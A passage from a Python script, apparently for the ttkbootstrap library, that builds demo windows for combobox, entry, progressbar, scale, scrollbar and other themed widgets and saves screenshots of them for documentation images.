b = ttk.Checkbutton(f1, text=f'{s}.Squaretoggle.Toolbutton', style=f'{s}.Squaretoggle.Toolbutton')
b.pack(fill='x', padx=5, pady=10)
b.invoke()
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_combobox_primary():
"""
Get screenshot for a combobox
"""
style = Style()
window = style.master
window.title('ttkbootstrap')
color = 'primary'
ss = Screenshot(window, f'../images/combobox_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TCombobox', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Combobox(f5, style=f'{color}.TCombobox')
a.insert('end', 'normal')
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Combobox(f5, style=f'{color}.TCombobox')
b.insert('end', 'active')
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Combobox(f5, style=f'{color}.TCombobox')
c.insert('end', 'focused')
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_combobox_secondary():
"""
Get screenshot for a combobox
"""
style = Style()
window = style.master
window.title('ttkbootstrap')
color = 'secondary'
ss = Screenshot(window, f'../images/combobox_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TCombobox', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Combobox(f5, style=f'{color}.TCombobox')
a.insert('end', 'normal')
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Combobox(f5, style=f'{color}.TCombobox')
b.insert('end', 'active')
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Combobox(f5, style=f'{color}.TCombobox')
c.insert('end', 'focused')
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_combobox_success():
"""
Get screenshot for a combobox
"""
style = Style()
window = style.master
window.title('ttkbootstrap')
color = 'success'
ss = Screenshot(window, f'../images/combobox_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TCombobox', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Combobox(f5, style=f'{color}.TCombobox')
a.insert('end', 'normal')
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Combobox(f5, style=f'{color}.TCombobox')
b.insert('end', 'active')
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Combobox(f5, style=f'{color}.TCombobox')
c.insert('end', 'focused')
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_combobox_info():
"""
Get screenshot for a combobox
"""
style = Style()
window = style.master
window.title('ttkbootstrap')
color = 'info'
ss = Screenshot(window, f'../images/combobox_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TCombobox', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Combobox(f5, style=f'{color}.TCombobox')
a.insert('end', 'normal')
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Combobox(f5, style=f'{color}.TCombobox')
b.insert('end', 'active')
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Combobox(f5, style=f'{color}.TCombobox')
c.insert('end', 'focused')
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_combobox_warning():
"""
Get screenshot for a combobox
"""
style = Style()
window = style.master
window.title('ttkbootstrap')
color = 'warning'
ss = Screenshot(window, f'../images/combobox_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TCombobox', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Combobox(f5, style=f'{color}.TCombobox')
a.insert('end', 'normal')
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Combobox(f5, style=f'{color}.TCombobox')
b.insert('end', 'active')
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Combobox(f5, style=f'{color}.TCombobox')
c.insert('end', 'focused')
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_combobox_danger():
"""
Get screenshot for a combobox
"""
style = Style()
window = style.master
window.title('ttkbootstrap')
color = 'danger'
ss = Screenshot(window, f'../images/combobox_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TCombobox', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Combobox(f5, style=f'{color}.TCombobox')
a.insert('end', 'normal')
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Combobox(f5, style=f'{color}.TCombobox')
b.insert('end', 'active')
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Combobox(f5, style=f'{color}.TCombobox')
c.insert('end', 'focused')
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
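# --- Hedged refactor sketch (not part of the original script) ----------------
# The six per-color combobox helpers above differ only in the `color` string; a
# single parameterized function could produce the same screenshots. The sketch
# below reuses the Style/Screenshot calls exactly as they appear above.
def _screenshot_combobox(color, screenshot_on=True, theme='flatly'):
    """Illustrative only: same layout as the per-color functions above."""
    style = Style(theme)
    window = style.master
    window.title('ttkbootstrap')
    ss = Screenshot(window, f'../images/combobox_{color}.png')
    f5 = ttk.Frame(window, padding=5)
    f5.pack(fill='both', side='left', expand='yes')
    ttk.Label(f5, text=f'{color}.TCombobox', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
    ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
    for state in ('normal', 'active', 'focused'):
        box = ttk.Combobox(f5, style=f'{color}.TCombobox')
        box.insert('end', state)
        box.pack(side='left', fill='x', padx=5, pady=10)
        if state == 'active':
            box.event_generate('<Enter>')
        elif state == 'focused':
            box.focus()
    if screenshot_on:
        window.after(1000, lambda: ss.get_bounding_box(None))
        window.after(1500, window.quit)
    window.mainloop()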
def screenshot_entry_primary():
"""
    Get screenshot for an entry
"""
style = Style()
window = style.master
window.title('ttkbootstrap')
color = 'primary'
ss = Screenshot(window, f'../images/entry_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TEntry', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Entry(f5, style=f'{color}.TEntry')
a.insert('end', 'normal')
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Entry(f5, style=f'{color}.TEntry')
b.insert('end', 'active')
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Entry(f5, style=f'{color}.TEntry')
c.insert('end', 'focused')
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_entry_secondary():
"""
    Get screenshot for an entry
"""
style = Style()
window = style.master
window.title('ttkbootstrap')
color = 'secondary'
ss = Screenshot(window, f'../images/entry_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TEntry', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Entry(f5, style=f'{color}.TEntry')
a.insert('end', 'normal')
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Entry(f5, style=f'{color}.TEntry')
b.insert('end', 'active')
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Entry(f5, style=f'{color}.TEntry')
c.insert('end', 'focused')
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_entry_success():
"""
    Get screenshot for an entry
"""
style = Style()
window = style.master
window.title('ttkbootstrap')
color = 'success'
ss = Screenshot(window, f'../images/entry_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TEntry', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Entry(f5, style=f'{color}.TEntry')
a.insert('end', 'normal')
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Entry(f5, style=f'{color}.TEntry')
b.insert('end', 'active')
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Entry(f5, style=f'{color}.TEntry')
c.insert('end', 'focused')
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_entry_info():
"""
    Get screenshot for an entry
"""
style = Style()
window = style.master
window.title('ttkbootstrap')
color = 'info'
ss = Screenshot(window, f'../images/entry_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TEntry', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Entry(f5, style=f'{color}.TEntry')
a.insert('end', 'normal')
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Entry(f5, style=f'{color}.TEntry')
b.insert('end', 'active')
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Entry(f5, style=f'{color}.TEntry')
c.insert('end', 'focused')
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_entry_warning():
"""
    Get screenshot for an entry
"""
style = Style()
window = style.master
window.title('ttkbootstrap')
color = 'warning'
ss = Screenshot(window, f'../images/entry_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TEntry', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Entry(f5, style=f'{color}.TEntry')
a.insert('end', 'normal')
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Entry(f5, style=f'{color}.TEntry')
b.insert('end', 'active')
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Entry(f5, style=f'{color}.TEntry')
c.insert('end', 'focused')
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_entry_danger():
"""
    Get screenshot for an entry
"""
style = Style()
window = style.master
window.title('ttkbootstrap')
color = 'danger'
ss = Screenshot(window, f'../images/entry_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TEntry', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Entry(f5, style=f'{color}.TEntry')
a.insert('end', 'normal')
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Entry(f5, style=f'{color}.TEntry')
b.insert('end', 'active')
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Entry(f5, style=f'{color}.TEntry')
c.insert('end', 'focused')
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_frame(screenshot_on=True, theme='flatly'):
"""
    Get screenshot for a frame
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('300x500')
ss = Screenshot(window, f'../images/frame.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'TFrame', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
f = ttk.Frame(f5, padding=20, style='TFrame')
f.pack(fill='both', expand='yes')
ttk.Label(f, text=f'TFrame', anchor='center').pack(fill='both', expand='yes')
for c in style.colors:
f = ttk.Frame(f5, padding=20, style=f'{c}.TFrame')
f.pack(fill='both', expand='yes')
ttk.Label(f, text=f'{c}.TFrame', anchor='center', style=f'{c}.Inverse.TLabel').pack(fill='both', expand='yes')
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_label(screenshot_on=True, theme='flatly'):
"""
Get screenshot for labels
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
ss = Screenshot(window, '../images/label.png')
# regular labels
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
ttk.Label(f1, text='TLabel', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f1).pack(fill='x', padx=5, pady=5)
ttk.Label(f1, text='TLabel', style=f'TLabel', width=20, padding=5).pack(fill='x', padx=5, pady=10)
for s in style.colors:
ttk.Label(f1, text=f'{s}.TLabel', style=f'{s}.TLabel', padding=5).pack(fill='x', padx=5, pady=10)
# inverse labels
f2 = ttk.Frame(window, padding=5)
f2.pack(fill='both', side='left', expand='yes')
ttk.Label(f2, text='Inverse.TLabel', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f2).pack(fill='x', padx=5, pady=5)
ttk.Label(f2, text='Inverse.TLabel', style='Inverse.TLabel', padding=5).pack(fill='x', padx=5, pady=10)
for s in style.colors:
ttk.Label(f2, text=f'{s}.Inverse.TLabel', style=f'{s}.Inverse.TLabel', padding=5).pack(fill='x', padx=5,
pady=10)
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_labelframe(screenshot_on=True, theme='flatly'):
"""
Get screenshot for labelframes
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('400x600')
ss = Screenshot(window, '../images/labelframe.png')
# header
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
ttk.Label(f1, text='TLabelframe', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f1).pack(fill='x', padx=5, pady=5)
ttk.Labelframe(f1, text='TLabelframe', style='TLabelframe', padding=10).pack(fill='both', expand='yes', padx=10,
pady=10)
for c in style.colors:
ttk.Labelframe(f1, text=f'{c}.TLabelframe', style=f'{c}.TLabelframe', padding=10).pack(fill='both',
expand='yes', padx=10,
pady=10)
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_menubutton(screenshot_on=True, theme='flatly'):
"""
Get screenshot for solid and outline menubuttons
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
ss = Screenshot(window, '../images/menubutton.png')
# solid menubuttons
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
ttk.Label(f1, text='TMenubutton', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f1).pack(fill='x', padx=5, pady=5)
ttk.Menubutton(f1, text='TMenubutton', style=f'TMenubutton', width=25).pack(fill='x', padx=5, pady=10)
for s in style.colors:
ttk.Menubutton(f1, text=f'{s}.TMenubutton', style=f'{s}.TMenubutton').pack(fill='x', padx=5, pady=10)
# outline menubuttons
f2 = ttk.Frame(window, padding=5)
f2.pack(fill='both', side='left', expand='yes')
ttk.Label(f2, text='Outline.TMenubutton', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f2).pack(fill='x', padx=5, pady=5)
ttk.Menubutton(f2, text='Outline.TMenubutton', style='Outline.TMenubutton', width=25).pack(fill='x', padx=5,
pady=10)
for s in style.colors:
ttk.Menubutton(f2, text=f'{s}.Outline.TMenubutton', style=f'{s}.Outline.TMenubutton').pack(fill='x', padx=5,
pady=10)
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_notebook(screenshot_on=True, theme='flatly'):
"""
Get screenshot for a notebook
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('400x300')
ss = Screenshot(window, '../images/notebook.png')
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
# widget
nb = ttk.Notebook(f1)
f6 = ttk.Frame(nb)
nb.add(f6, text='Tab 1')
nb.add(ttk.Frame(nb), text='Tab 2')
nb.add(ttk.Frame(nb), text='Tab 3')
ttk.Label(f6, text='TNotebook', font='Helvetica 10 bold', anchor='center').pack(fill='both', expand='yes', pady=5)
nb.pack(fill='both', expand='yes')
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_progressbar_horizontal(screenshot_on=True, theme='flatly'):
"""
Get screenshot for horizontal progressbars
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('600x400')
ss = Screenshot(window, '../images/progressbar_horizontal.png')
# headers
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
ttk.Label(f1, text='Horizontal.TProgressbar', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f1).pack(fill='x', padx=5, pady=(5, 10))
# widgets
for c in style.colors:
ttk.Label(f1, text=f'{c}.Horizontal.TProgressbar').pack(fill='x', padx=10)
ttk.Progressbar(f1, value=75, style=f'{c}.Horizontal.TProgressbar').pack(fill='x', expand='yes', padx=10,
pady=(0, 10))
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_progressbar_horizontal_striped(screenshot_on=True, theme='flatly'):
"""
Get screenshot for horizontal striped progressbars
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('600x400')
ss = Screenshot(window, '../images/progressbar_horizontal_striped.png')
# headers
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
ttk.Label(f1, text='Striped.Horizontal.TProgressbar', font='Helvetica 10 bold', anchor='center').pack(fill='x',
pady=5)
ttk.Separator(f1).pack(fill='x', padx=5, pady=(5, 10))
# widgets
for c in style.colors:
ttk.Label(f1, text=f'{c}.Striped.Horizontal.TProgressbar').pack(fill='x', padx=10)
ttk.Progressbar(f1, value=75, style=f'{c}.Striped.Horizontal.TProgressbar').pack(fill='x', expand='yes',
padx=10,
pady=(0, 10))
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_progressbar_vertical(screenshot_on=True, theme='flatly'):
"""
    Get screenshot for vertical progressbars
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('600x400')
ss = Screenshot(window, '../images/progressbar_vertical.png')
import tkinter as tk
canvas = tk.Canvas(window, border=0, highlightthickness=0)
canvas.pack(fill='both', side='left', expand='yes')
ttk.Label(canvas, text='Vertical.TProgressbar', font='Helvetica 10 bold', anchor='center').pack(fill='x',
pady=(10, 5))
ttk.Separator(canvas).pack(fill='x', padx=5, pady=(5, 10))
i = 50
for c in style.colors:
canvas.create_text((i, 200), text=f'{c}.Vertical.TProgressbar', angle=90, font='Helvetica 10')
pb = ttk.Progressbar(canvas, value=75, style=f'{c}.Vertical.TProgressbar', orient='vertical', length=300)
i += 25
canvas.create_window((i, 225), window=pb)
i += 70
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
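# Note (hedged observation, not part of the original script): the vertical-widget
# helpers (progressbar, scale, separator) draw their captions with
# canvas.create_text(..., angle=90) and place the widgets via canvas.create_window(),
# since ttk itself has no rotated-label widget.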
def screenshot_radiobutton(screenshot_on=True, theme='flatly'):
"""
Get screenshot for a radiobutton
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('272x310')
ss = Screenshot(window, '../images/radiobutton.png')
f1 = ttk.Frame(window, padding=10)
f1.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f1, text='TRadiobutton', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f1).pack(fill='x', padx=5, pady=5)
window.setvar('option', 1)
# buttons
for s in style.colors:
b = ttk.Radiobutton(f1, text=f'{s}.TRadiobutton', variable='option', value=1, style=f'{s}.TRadiobutton')
b.pack(fill='x', padx=5, pady=10)
ttk.Radiobutton(f1, text='unselected').pack(fill='x', padx=5, pady=10)
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_radiobutton_toolbutton(screenshot_on=True, theme='flatly'):
"""
Get screenshot for radiobutton toolbutton
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
ss = Screenshot(window, '../images/radiobutton_toolbutton.png')
f5 = ttk.Frame(window, padding=10)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text='Toolbutton', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=(5, 10))
def create_frame(parent, c):
"""Create frame for each item and insert widgets"""
parent.setvar(f'{c}-a', True)
parent.setvar(f'{c}-b', False)
parent.setvar(f'{c}-c', False)
ttk.Label(parent, text=f'{c}.Toolbutton').pack(padx=5, pady=(5, 0), fill='x')
frame = ttk.Frame(parent)
frame.pack()
ttk.Radiobutton(frame, variable=f'{c}-a', text='Selected', style=f'{c}.Toolbutton', padding=5, width=10).pack(
side='left', pady=(5, 10), fill='x')
ttk.Radiobutton(frame, variable=f'{c}-b', text='Radio', style=f'{c}.Toolbutton', padding=5, width=10).pack(
side='left', pady=(5, 10), fill='x')
ttk.Radiobutton(frame, variable=f'{c}-c', text='Radio', style=f'{c}.Toolbutton', padding=5, width=10).pack(
side='left', pady=(5, 10), fill='x')
return frame
for c in style.colors:
create_frame(f5, c).pack()
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_radiobutton_outline_toolbutton(screenshot_on=True, theme='flatly'):
"""
    Get screenshot for radiobutton outline toolbutton
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
ss = Screenshot(window, '../images/radiobutton_outline_toolbutton.png')
f5 = ttk.Frame(window, padding=10)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text='Outline.Toolbutton', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=(5, 10))
def create_frame(parent, c):
"""Create frame for each item and insert widgets"""
parent.setvar(f'{c}-a', True)
parent.setvar(f'{c}-b', False)
parent.setvar(f'{c}-c', False)
ttk.Label(parent, text=f'{c}.Outline.Toolbutton').pack(padx=5, pady=(5, 0), fill='x')
frame = ttk.Frame(parent)
frame.pack()
ttk.Radiobutton(frame, variable=f'{c}-a', text='Selected', style=f'{c}.Outline.Toolbutton', padding=5,
width=10).pack(
side='left', pady=(5, 10), fill='x')
ttk.Radiobutton(frame, variable=f'{c}-b', text='Radio', style=f'{c}.Outline.Toolbutton', padding=5,
width=10).pack(
side='left', pady=(5, 10), fill='x')
ttk.Radiobutton(frame, variable=f'{c}-c', text='Radio', style=f'{c}.Outline.Toolbutton', padding=5,
width=10).pack(
side='left', pady=(5, 10), fill='x')
return frame
for c in style.colors:
create_frame(f5, c).pack()
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_scale_horizontal(screenshot_on=True, theme='flatly'):
"""
Get screenshot for horizontal scale
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('500x400')
ss = Screenshot(window, '../images/scale_horizontal.png')
# headers
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
ttk.Label(f1, text='Horizontal.TScale', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f1).pack(fill='x', padx=5, pady=(5, 10))
# widgets
for c in style.colors:
ttk.Label(f1, text=f'{c}.Horizontal.TScale').pack(fill='x', padx=10)
ttk.Scale(f1, value=75, from_=0, to=100, style=f'{c}.Horizontal.TScale', length=300).pack(fill='x',
expand='yes', padx=10,
pady=(0, 10))
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_scale_vertical(screenshot_on=True, theme='flatly'):
"""
    Get screenshot for vertical scale
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('500x400')
ss = Screenshot(window, '../images/scale_vertical.png')
import tkinter as tk
canvas = tk.Canvas(window, border=0, highlightthickness=0)
canvas.pack(fill='both', side='left', expand='yes')
ttk.Label(canvas, text='Vertical.TScale', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=(10, 5))
ttk.Separator(canvas).pack(fill='x', padx=5, pady=(5, 10))
i = 40
for c in style.colors:
canvas.create_text((i, 200), text=f'{c}.Vertical.TScale', angle=90, font='Helvetica 10')
pb = ttk.Scale(canvas, from_=1, to=100, value=75, style=f'{c}.Vertical.TScale', orient='vertical', length=300)
i += 25
canvas.create_window((i, 225), window=pb)
i += 50
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_scrollbar_horizontal(screenshot_on=True, theme='flatly'):
"""
Get screenshot for horizontal scrollbar
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('400x125')
ss = Screenshot(window, '../images/scrollbar_horizontal.png')
# headers
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
ttk.Label(f1, text='Horizontal.TScrollbar', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f1).pack(fill='x', padx=5, pady=(5, 10))
# widgets
hs = ttk.Scrollbar(f1, orient='horizontal')
hs.pack(fill='x', padx=10, pady=10)
hs.set(0.2, 0.3)
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_scrollbar_vertical(screenshot_on=True, theme='flatly'):
"""
    Get screenshot for vertical scrollbar
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('150x400')
ss = Screenshot(window, '../images/scrollbar_vertical.png')
# headers
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
ttk.Label(f1, text='Vertical.TScrollbar', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f1).pack(fill='x', padx=5, pady=(5, 10))
# widgets
hs = ttk.Scrollbar(f1, orient='vertical')
hs.pack(fill='y', padx=10, pady=10, expand='yes')
hs.set(0.2, 0.3)
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_separator_horizontal(screenshot_on=True, theme='flatly'):
"""
Get screenshot for horizontal separator
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('475x400')
ss = Screenshot(window, '../images/separator_horizontal.png')
# headers
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
ttk.Label(f1, text='Horizontal.TSeparator', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=(5, 15))
# widgets
for c in style.colors:
ttk.Label(f1, text=f'{c}.Horizontal.TSeparator').pack(fill='x', padx=10)
ttk.Separator(f1, style=f'{c}.Horizontal.TSeparator').pack(fill='x', expand='yes', padx=10, pady=(0, 10))
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_separator_vertical(screenshot_on=True, theme='flatly'):
"""
Get screenshot for vertical separator
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('475x400')
ss = Screenshot(window, '../images/separator_vertical.png')
import tkinter as tk
canvas = tk.Canvas(window, borderwidth=0, relief='flat', highlightthickness=0)
canvas.pack(fill='both', side='left', expand='yes')
ttk.Label(canvas, text='Vertical.TSeparator', font='Helvetica 10 bold', anchor='center').pack(fill='x',
pady=(5, 20))
i = 40
